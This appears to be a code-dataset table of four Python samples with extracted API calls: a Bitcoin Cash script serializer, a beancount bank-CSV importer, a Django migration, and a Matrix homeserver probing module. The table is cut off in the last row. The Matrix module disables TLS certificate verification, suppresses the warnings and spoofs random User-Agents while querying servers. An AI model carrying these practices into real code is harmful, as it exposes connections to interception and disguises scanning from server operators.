| code (string, lengths 22–1.05M) | apis (list, lengths 1–3.31k) | extract_api (string, lengths 75–3.25M) |
|---|---|---|
import sys
from io import BytesIO
from binascii import hexlify, unhexlify
import hashlib
import bchscript.bchopcodes as bchopcodes
import bchscript.cashaddrutil as cashaddrutil
import bchscript.errors as err
if not "BCH_ADDRESS_PREFIX" in globals(): # don't initialize twice
BCH_ADDRESS_PREFIX = None
BCH_TESTNET = "bchtest:"
BCH_MAINNET = "bitcoincash:"
BCH_REGTEST = "bchreg:"
BCH_ANYNET = None
def ScriptifyData(tmp):
if type(tmp) is list:
ret = []
for t in tmp:
ret.append(ScriptifyData(t))
return b"".join(ret)
    ret = []
    if type(tmp) is str:
        tmp = bytes(tmp, "utf-8")
    l = len(tmp)
    if l == 0:  # push empty value onto the stack
        ret.append(bytes([0]))
    elif l <= 0x4b:
        ret.append(bytes([l]))  # 1-75 bytes: push # of bytes as the opcode
        ret.append(tmp)
    elif l < 256:
        ret.append(bytes([bchopcodes.opcode2bin["OP_PUSHDATA1"]]))
        ret.append(bytes([l]))
        ret.append(tmp)
    elif l < 65536:
        ret.append(bytes([bchopcodes.opcode2bin["OP_PUSHDATA2"]]))
        ret.append(bytes([l & 255, l >> 8]))  # little endian
        ret.append(tmp)
    else:  # bigger values won't fit on the stack anyway
        assert 0, "cannot push %d bytes" % l
    return b"".join(ret)
def ScriptifyNumber(num):
if num == 0:
return bytes([0])
elif num < 17:
return bytes([num+0x80])
elif num < 256:
return ScriptifyData(bytes([num]))
elif num < 65536:
return ScriptifyData(num.to_bytes(2, byteorder="little"))
elif num < (1<<32):
return ScriptifyData(num.to_bytes(4, byteorder="little"))
else:
return ScriptifyData(num.to_bytes(8, byteorder="little"))
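# Illustrative usage sketch (not part of the original source): multi-byte
# numbers are serialized little-endian and wrapped in a data push, e.g.
#   ScriptifyNumber(0)    ->  b"\x00"
#   ScriptifyNumber(300)  ->  b"\x02\x2c\x01"   (push 2 bytes; 300 == 0x012c)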
def sha256(msg):
"""Return the sha256 hash of the passed data. Non binary data is automatically converted
>>> hexlify(sha256("e hat eye pie plus one is O"))
b'c5b94099f454a3807377724eb99a33fbe9cb5813006cadc03e862a89d410eaf0'
"""
msg = anything2bytes(msg)
return hashlib.new('sha256', msg).digest()
def hash256(s):
"""Return the double SHA256 hash (what bitcoin typically uses) of the passed data. Non binary data is automatically converted
>>> hexlify(hash256("There was a terrible ghastly silence".encode()))
b'730ac30b1e7f4061346277ab639d7a68c6686aeba4cc63280968b903024a0a40'
"""
return sha256(sha256(s))
def hash160(msg):
"""RIPEME160(SHA256(msg)) -> bytes"""
h = hashlib.new('ripemd160')
msg = anything2bytes(msg)
h.update(hashlib.sha256(msg).digest())
return h.digest()
def blake2b(msg, len=32):
msg = anything2bytes(msg)
return hashlib.blake2b(msg, digest_size=len).digest()
def listify(obj):
"""wrap a list around something, if it is not currently a list"""
if type(obj) is list:
return obj
return [obj]
def templatedJoin(listOfData):
ret = [b""]
# join binary strings, preserve other types as separate items
for l in listOfData:
if type(l) is bytes and type(ret[-1]) is bytes:
ret[-1] = ret[-1] + l
else:
ret.append(l)
    # strip off the list if there is no template
if len(ret) == 1 and type(ret[0]) is bytes:
ret = ret[0]
return ret
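# Illustrative usage sketch (not part of the original source): adjacent byte
# strings are fused, while template/satisfier placeholders stay separate, e.g.
#   templatedJoin([b"a", b"b"])        ->  b"ab"
#   templatedJoin([b"a", "$x", b"b"])  ->  [b"a", "$x", b"b"]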
def applyTemplate(template, **kwargs):
    if type(template) is bytes: # it's already raw bytes, nothing to do
return template
applied = []
for t in template:
if type(t) is str:
            if t[0] == '$':
                t = kwargs.get(t[1:], t) # Use the binding, or the name if there is no binding
                applied.append(t)
            elif t[0] == '@':
                applied.append(t)
            else:
                raise err.Output("bad template")
else:
applied.append(t)
return applied
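# Illustrative usage sketch (not part of the original source): "$" names are
# bound from kwargs, while "@" names pass through untouched, e.g.
#   applyTemplate(["$sig", b"\xac"], sig=b"\x01")  ->  [b"\x01", b"\xac"]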
def script2bin(opcodes, showSatisfierItems=True, showTemplateItems=True):
"""Convert a program to a binary string"""
if not type(opcodes) is list:
opcodes = [opcodes]
ret = []
for opcode in opcodes:
s = None
if type(opcode) is str:
if opcode[0] == "@": # its an existing stack arg, so no-op
s = opcode
elif opcode[0] == "$": # its an existing stack arg, so no-op
s = opcode
else:
ret.append(opcode.encode("utf-8"))
# serialize object to bytes
elif hasattr(opcode, "scriptify"):
s = opcode.scriptify()
elif hasattr(opcode, "serialize"):
s = opcode.serialize()
elif type(opcode) is int:
s = ScriptifyNumber(opcode)
elif type(opcode) is bytes: # encode the command to push data onto stack, then the data
s = ScriptifyData(opcode)
else:
assert 0, "Not fully compiled: %s" % opcode
if type(s) is str:
if s[0] == "@": # its an existing stack arg, so no-op
if showSatisfierItems:
ret.append(s)
elif s[0] == "$": # its an existing stack arg, so no-op
if showTemplateItems:
ret.append(s)
else:
ret.append(opcode.encode("utf-8"))
else:
            if s is not None:
ret.append(s)
return templatedJoin(ret)
def script2hex(opcodes):
"""Convert a program to a hex string suitable for RPC"""
return hexlify(script2bin(opcodes)).decode("utf-8")
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(unhexlify(hex_string.encode('ascii'))))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
if type(obj) is bytes:
return hexlify(obj).decode('ascii')
if type(obj) is str:
if obj[0] == '@': # include satisfier script inputs
return "_" + obj + "_"
if obj[0] == '$': # include template params
return "_" + obj + "_"
if type(obj) is list:
r = []
for i in obj:
if not i: # skip empty
continue
r.append(ToHex(i))
return "".join(r)
return hexlify(obj.serialize()).decode('ascii')
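# Illustrative usage sketch (not part of the original source):
#   ToHex(b"\xab\xcd")  ->  'abcd'
#   ToHex("@sig")       ->  '_@sig_'   (placeholders are marked, not hexlified)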
class InvalidAddress(Exception):
"""Raised on generic invalid base58 data, such as bad characters.
Checksum failures raise Base58ChecksumError specifically.
"""
pass
def bitcoinAddress2bin(btcAddress):
"""convert a bitcoin address to binary data capable of being put in a CScript"""
# chop the version and checksum out of the bytes of the address
if ":" in btcAddress:
pfx, addr = btcAddress.split(":")
decoded = cashaddrutil.b32decode(addr)
if not cashaddrutil.verify_checksum(pfx, decoded):
raise InvalidAddress('Bad cash address checksum')
converted = cashaddrutil.convertbits(decoded, 5, 8)
return bytes(converted[1:21]) # 0 is address type, last 6 are checksum
else:
return decodeBase58(btcAddress)[1:-4]
B58_DIGITS = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def decodeBase58(s):
"""Decode a base58-encoding string, returning bytes"""
if not s:
return b''
# Convert the string to an integer
n = 0
for c in s:
n *= 58
if c not in B58_DIGITS:
raise InvalidAddress('Character %r is not a valid base58 character' % c)
digit = B58_DIGITS.index(c)
n += digit
# Convert the integer to bytes
h = '%x' % n
if len(h) % 2:
h = '0' + h
res = unhexlify(h.encode('utf8'))
# Add padding back.
pad = 0
for c in s[:-1]:
if c == B58_DIGITS[0]:
pad += 1
else:
break
return b'\x00' * pad + res
def encodeBase58(b):
"""Encode bytes to a base58-encoded string"""
# Convert big-endian bytes to integer
n = int('0x0' + hexlify(b).decode('utf8'), 16)
    # Divide that integer into base58
res = []
while n > 0:
n, r = divmod(n, 58)
res.append(B58_DIGITS[r])
res = ''.join(res[::-1])
# Encode leading zeros as base58 zeros
czero = b'\x00'
    if sys.version_info[0] >= 3:
# In Python3 indexing a bytes returns numbers, not characters.
czero = 0
pad = 0
for c in b:
if c == czero:
pad += 1
else:
break
return B58_DIGITS[0] * pad + res
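# Illustrative usage sketch (not part of the original source): leading zero
# bytes become leading '1' characters, and the two functions round-trip, e.g.
#   encodeBase58(b"\x00\x01")  ->  '12'
#   decodeBase58('12')         ->  b'\x00\x01'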
def encodeBitcoinAddress(prefix, data):
data2 = prefix + data
cksm = hash256(data2)[:4]
data3 = data2 + cksm
b58 = encodeBase58(data3)
return b58
def anything2bytes(msg):
if type(msg) is int:
msg = bytes([msg])
if type(msg) is str:
msg = msg.encode("utf-8")
return msg
def reportBadStatement(tokens, n, symbols, printIt=True):
s = "ERROR: Bad statement or undefined symbol: %s\n" % tokens[n]
s+= " Known symbols: %s\n" % list(filter(lambda x: type(x) is str, symbols.keys()))
s+= " Context: %s\n" % tokens[n-10:n+10]
if printIt: print(s)
return s
def warn(s):
print(s, file=sys.stderr)
|
[
"binascii.hexlify",
"bchscript.cashaddrutil.verify_checksum",
"bchscript.cashaddrutil.convertbits",
"bchscript.cashaddrutil.b32decode",
"hashlib.sha256",
"hashlib.new",
"bchscript.errors.Output",
"hashlib.blake2b"
] |
[((2539, 2563), 'hashlib.new', 'hashlib.new', (['"""ripemd160"""'], {}), "('ripemd160')\n", (2550, 2563), False, 'import hashlib\n'), ((6778, 6806), 'bchscript.cashaddrutil.b32decode', 'cashaddrutil.b32decode', (['addr'], {}), '(addr)\n', (6800, 6806), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((6948, 6987), 'bchscript.cashaddrutil.convertbits', 'cashaddrutil.convertbits', (['decoded', '(5)', '(8)'], {}), '(decoded, 5, 8)\n', (6972, 6987), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((2100, 2126), 'hashlib.new', 'hashlib.new', (['"""sha256"""', 'msg'], {}), "('sha256', msg)\n", (2111, 2126), False, 'import hashlib\n'), ((2728, 2765), 'hashlib.blake2b', 'hashlib.blake2b', (['msg'], {'digest_size': 'len'}), '(msg, digest_size=len)\n', (2743, 2765), False, 'import hashlib\n'), ((6822, 6864), 'bchscript.cashaddrutil.verify_checksum', 'cashaddrutil.verify_checksum', (['pfx', 'decoded'], {}), '(pfx, decoded)\n', (6850, 6864), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((2607, 2626), 'hashlib.sha256', 'hashlib.sha256', (['msg'], {}), '(msg)\n', (2621, 2626), False, 'import hashlib\n'), ((5840, 5852), 'binascii.hexlify', 'hexlify', (['obj'], {}), '(obj)\n', (5847, 5852), False, 'from binascii import hexlify, unhexlify\n'), ((3796, 3822), 'bchscript.errors.Output', 'err.Output', (['"""bad template"""'], {}), "('bad template')\n", (3806, 3822), True, 'import bchscript.errors as err\n'), ((8008, 8018), 'binascii.hexlify', 'hexlify', (['b'], {}), '(b)\n', (8015, 8018), False, 'from binascii import hexlify, unhexlify\n')]
|
#!/usr/bin/env python3
import datetime
import csv
import re
from decimal import Decimal
from beancount.ingest import importer
from beancount.core import data
from beancount.core.amount import Amount
VERSION = '0.1.3'
class CSVImporter(importer.ImporterProtocol):
ENCODING = 'iso-8859-15'
HEAD = re.compile(r'^\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$')
FIELDS = ['Radnummer',
'Clearingnummer',
'Kontonummer',
'Produkt',
'Valuta',
'Bokföringsdag',
'Transaktionsdag',
'Valutadag',
'Referens',
'Beskrivning',
'Belopp',
]
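    # Illustrative sketch (not part of the original source): per the HEAD regex
    # above, the first line of an export is expected to look like
    #   * Transaktioner Period 2020-01-01.2020-01-31 Skapad 2020-02-01 10:00 CET
    # (dates, time, and timezone here are placeholders).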
def __init__(self, accounts, encoding=None, *args, **kwargs):
self.accounts = accounts
self.encoding = encoding or CSVImporter.ENCODING
super().__init__(*args, **kwargs)
def name(self):
return "SwebankImporter.vonshednob.github.com"
def file_date(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
match = CSVImporter.HEAD.match(fd.readline())
            if not match:
                raise RuntimeError("unrecognized header line in %s" % file_.name)
return datetime.datetime.strptime(match.group(3), "%Y-%m-%d").date()
def file_account(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
fd.readline()
fd.readline()
reader = csv.reader(fd, delimiter=',', quotechar='"')
for row in reader:
return self.accounts.get(row[4], None)
return None
def identify(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
try:
line = fd.readline()
if not CSVImporter.HEAD.match(line):
return False
            except Exception:
pass
line = fd.readline().strip()
return line.startswith(','.join(CSVImporter.FIELDS))
return False
def extract(self, file_, previous=None):
transactions = []
with open(file_.name, 'rt', encoding=self.encoding) as fd:
fd.readline()
reader = csv.DictReader(fd, delimiter=',', quotechar='"')
for lineno, row in enumerate(reader):
meta = data.new_metadata(file_.name, lineno+2)
date = datetime.datetime.strptime(row['Valutadag'], "%Y-%m-%d").date()
account = self.accounts.get(row['Produkt'], None)
amount = Amount(Decimal(row['Belopp']), row['Valuta'])
payee = None
links = set()
tags = set()
narration = row['Beskrivning'].lower()
if row['Referens'].lower() != row['Beskrivning'].lower():
narration += " " + row['Referens'].lower()
postings = [
data.Posting(account,
amount,
None, # cost
None, # price
None, # flag
None, # meta
)
]
transaction = data.Transaction(meta,
date,
'*',
payee,
narration.title(),
tags,
links,
postings)
transactions.append(transaction)
return transactions
|
[
"csv.reader",
"decimal.Decimal",
"csv.DictReader",
"datetime.datetime.strptime",
"beancount.core.data.Posting",
"beancount.core.data.new_metadata",
"re.compile"
] |
[((309, 503), 're.compile', 're.compile', (['"""^\\\\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$"""'], {}), "(\n '^\\\\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$'\n )\n", (319, 503), False, 'import re\n'), ((1572, 1616), 'csv.reader', 'csv.reader', (['fd'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(fd, delimiter=\',\', quotechar=\'"\')\n', (1582, 1616), False, 'import csv\n'), ((2322, 2370), 'csv.DictReader', 'csv.DictReader', (['fd'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(fd, delimiter=\',\', quotechar=\'"\')\n', (2336, 2370), False, 'import csv\n'), ((2444, 2485), 'beancount.core.data.new_metadata', 'data.new_metadata', (['file_.name', '(lineno + 2)'], {}), '(file_.name, lineno + 2)\n', (2461, 2485), False, 'from beancount.core import data\n'), ((2669, 2691), 'decimal.Decimal', 'Decimal', (["row['Belopp']"], {}), "(row['Belopp'])\n", (2676, 2691), False, 'from decimal import Decimal\n'), ((3037, 3090), 'beancount.core.data.Posting', 'data.Posting', (['account', 'amount', 'None', 'None', 'None', 'None'], {}), '(account, amount, None, None, None, None)\n', (3049, 3090), False, 'from beancount.core import data\n'), ((2507, 2563), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["row['Valutadag']", '"""%Y-%m-%d"""'], {}), "(row['Valutadag'], '%Y-%m-%d')\n", (2533, 2563), False, 'import datetime\n')]
|
# Generated by Django 3.0.5 on 2020-04-04 17:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Trend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True)),
('data', models.TextField(blank=True)),
],
),
migrations.CreateModel(
name='Keyword',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=255)),
('trends', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='home.Trend')),
],
),
]
|
[
"django.db.models.TextField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateField"
] |
[((334, 427), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (350, 427), False, 'from django.db import migrations, models\n'), ((451, 486), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (467, 486), False, 'from django.db import migrations, models\n'), ((514, 542), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (530, 542), False, 'from django.db import migrations, models\n'), ((676, 769), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (692, 769), False, 'from django.db import migrations, models\n'), ((793, 837), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)'}), '(blank=True, max_length=255)\n', (809, 837), False, 'from django.db import migrations, models\n'), ((867, 946), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""home.Trend"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='home.Trend')\n", (884, 946), False, 'from django.db import migrations, models\n')]
|
## Import modules
import dns
import json
import logging
import re
import requests
import ssl
import socket
import srvlookup
import urllib3
from fake_useragent import UserAgent
## Functions
def resolve_well_known(hostname):
"""Get delegated hostname and port from hostname
Try and look up the well-know server file for a hostname, then if this file exists return
the delegated hostname and port, or return an empty string if no well known server file exists.
Args:
hostname: A hostname as found in the Matrix ID.
Returns:
Delegated hostname and port in the format sub.domain.tld:port:wellknown
Or an empty string if no luck.
"""
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set well-known URL
well_known_url = f'https://{hostname}/.well-known/matrix/server'
    # Try to download well-known server file
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
well_known_request = requests.get(well_known_url, headers=headers, allow_redirects=True, verify=False, timeout=3)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
# If not 200
if not well_known_request.status_code == 200:
return(None)
    # Try and decode json, then split domain.tld:port
    try:
        delegated_hostname, delegated_port = str(well_known_request.json()['m.server']).split(':')
    # If converting to json fails it's probably a bitstream or something
    except json.decoder.JSONDecodeError:
        return(None)
    # 'm.server' key missing from the well-known file
    except KeyError:
        return(None)
    # No ':' in m.server, so assume the default port 443
    except ValueError:
        delegated_hostname = str(well_known_request.json()['m.server'])
        delegated_port = 443
        return(f'{delegated_hostname}:{delegated_port}:wellknown')
    else:
        return(f'{delegated_hostname}:{delegated_port}:wellknown')
def resolve_srv(hostname):
"""Get delegated hostname and port from DNS SRV record
Try and look up the DNS SRV record for a hostname, then if this exists return
the delegated hostname, port and srv, or return an empty string if no well known server file exists.
Args:
hostname: A hostname as found in the Matrix ID.
Returns:
Delegated hostname and port in the format sub.domain.tld:port:srv
Or an empty string if no luck.
"""
    # Turn off annoying logging to terminal from srvlookup
    logging.getLogger('srvlookup').setLevel(logging.CRITICAL)
# Try and look up SRV record
try:
srv = srvlookup.lookup('matrix', 'TCP', hostname)
# SRV lookup fail (except no record found)
except (srvlookup.SRVQueryFailure, UnicodeError, dns.name.LabelTooLong):
return(None)
# SRV lookup returns something
else:
# Successful SRV lookup
if 'Error querying SRV' not in srv[0]:
delegated_hostname = srv[0].hostname
delegated_port = srv[0].port
return(f'{delegated_hostname}:{delegated_port}:srv')
        # Error querying
else:
return(None)
def resolve_delegated_homeserver(hostname):
"""Return delegated hostname and port from a hostname
    Tries to look up the well-known server file, then the SRV DNS record.
If both fail, return the arg hostname with assumed port 8448.
Args:
hostname: A hostname (the domain part of a Matrix ID).
Returns:
A string containing delegated hostname and port for the hostname in this format:
sub.domain.tld:port:server-resolve-type
"""
# If hostname is an ip
re_ipv4 = re.compile(r'((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))')
re_ipv6 = re.compile(r'((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))')
if re_ipv4.match(hostname) or re_ipv6.match(hostname):
return(f'{hostname}:8448:ip')
# If a well-known
temp = resolve_well_known(hostname)
if temp:
return temp
# If a srv
temp = resolve_srv(hostname)
if temp:
return temp
# Else, assume A or AAAA and assume port 8448
return(f'{hostname}:8448:a')
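# Illustrative sketch (not part of the original source): the resolution order
# above is well-known file -> SRV record -> plain A/AAAA with the default
# federation port, so typical (hypothetical) results look like
# "synapse.example.org:443:wellknown", "matrix.example.org:8448:srv",
# or "example.org:8448:a".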
def https_download(hostname, path, port=443, raw=False):
"""Try and download something over https
    Try and download something over https. Decode and return whatever was downloaded, or return None if the download failed.
    Args:
        hostname: A hostname or an IP address.
        path: What to download. For example /_matrix/static.
        port: A port. Default 443.
        raw: Return raw json data, assuming no errors. Default False.
    Returns:
        Some decoded content if there is some and it is not a 404. If 404 or another failure, return None.
"""
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set URL
url = f'https://{hostname}:{port}{path}'
# Try and download
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
http_request = requests.get(url, headers=headers, allow_redirects=True, verify=False, timeout=1)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
# If not 200
if not http_request.status_code == 200:
return(None)
if raw:
return(http_request.json())
# Try and decode json, then split domain.tld:port
try:
delegated_hostname, delegated_port = str(http_request.json()['m.server']).split(':')
# If converting to json fails it's probably a bitstream or something
except json.decoder.JSONDecodeError:
return(None)
    # Split on ':' failed because no ':' is present, so assume port 443
    except ValueError:
        delegated_hostname = str(http_request.json()['m.server'])
        return(f'{delegated_hostname}:443')
else:
return(f'{delegated_hostname}:{delegated_port}')
def check_matrix_server(hostname):
"""Check if and save there is a Synapse or Dendrite server on a url
Check if there is a Synapse or Dendrite server on a url:port. If there is a Synapse/Dendrite there,
look up IP and version.
Args:
hostname: Some URL from Matrix IDs in format sub.domain.com
Return:
A string with delegated hostname, IP, port and resolve type if the hostname is active.
Return None if not a Matrix server or server is dead.
"""
# Clean up hostname to exclude errors
hostname = hostname.strip()
hostname = hostname.replace('http://', '')
hostname = hostname.replace('https://', '')
if '!' in hostname:
hostname = hostname.replace('!', '')
_, hostname = hostname.split(':', 1)
if '?' in hostname:
hostname, _ = hostname.split('?', 1)
if '#' in hostname:
hostname = hostname.replace('#', '')
# If port is already known
port = None
if ':' in hostname:
hostname, port = hostname.split(':')
# Get delegated stuff
delegated_hostname, delegated_port, server_lookup_type = str(resolve_delegated_homeserver(hostname)).split(':')
if port:
delegated_port = port
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set version URL
version_url = f'https://{delegated_hostname}:{delegated_port}/_matrix/federation/v1/version'
    # Try to download version
valid_ssl = True
try:
version_request = requests.get(version_url, headers=headers, allow_redirects=True, timeout=3)
# If ssl error
except (requests.exceptions.SSLError, ssl.SSLCertVerificationError, ssl.SSLError):
try:
version_request = requests.get(version_url, headers=headers, allow_redirects=True, verify=False, timeout=3)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.TooManyRedirects,
socket.timeout,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
            return(None)
        valid_ssl = False
# If connection error
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
    # If not response code 200
    if not version_request.status_code == 200:
        return(None)
# Try and decode json
try:
version_json = version_request.json()
# If converting to json fails it's probably a bitstream or something
except json.decoder.JSONDecodeError:
return(None)
# Get version data
else:
name = version_json['server']['name']
version = version_json['server']['version']
# Get the IP for the Matrix server
delegated_ip = socket.gethostbyname(delegated_hostname)
# Create ; separated string and return it
out_string = f'{hostname};{delegated_hostname};{delegated_ip};{delegated_port};{server_lookup_type};{name};{version};'
if valid_ssl:
out_string += 'yes'
else:
out_string += 'no'
return(out_string)
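# Illustrative sketch (not part of the original source): for a live homeserver
# the returned string looks like (hostnames, IP, and version are hypothetical)
#   "example.org;synapse.example.org;192.0.2.1;443;wellknown;Synapse;1.2.3;yes"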
|
[
"fake_useragent.UserAgent",
"socket.gethostbyname",
"requests.get",
"srvlookup.lookup",
"urllib3.disable_warnings",
"logging.getLogger",
"re.compile"
] |
[((732, 743), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (741, 743), False, 'from fake_useragent import UserAgent\n'), ((928, 995), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (952, 995), False, 'import urllib3\n'), ((4008, 4138), 're.compile', 're.compile', (['"""((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))"""'], {}), "(\n    '((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))'\n    )\n", (4018, 4138), False, 'import re\n'), ((4143, 4830), 're.compile', 're.compile', (['"""((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))"""'], {}), "(\n    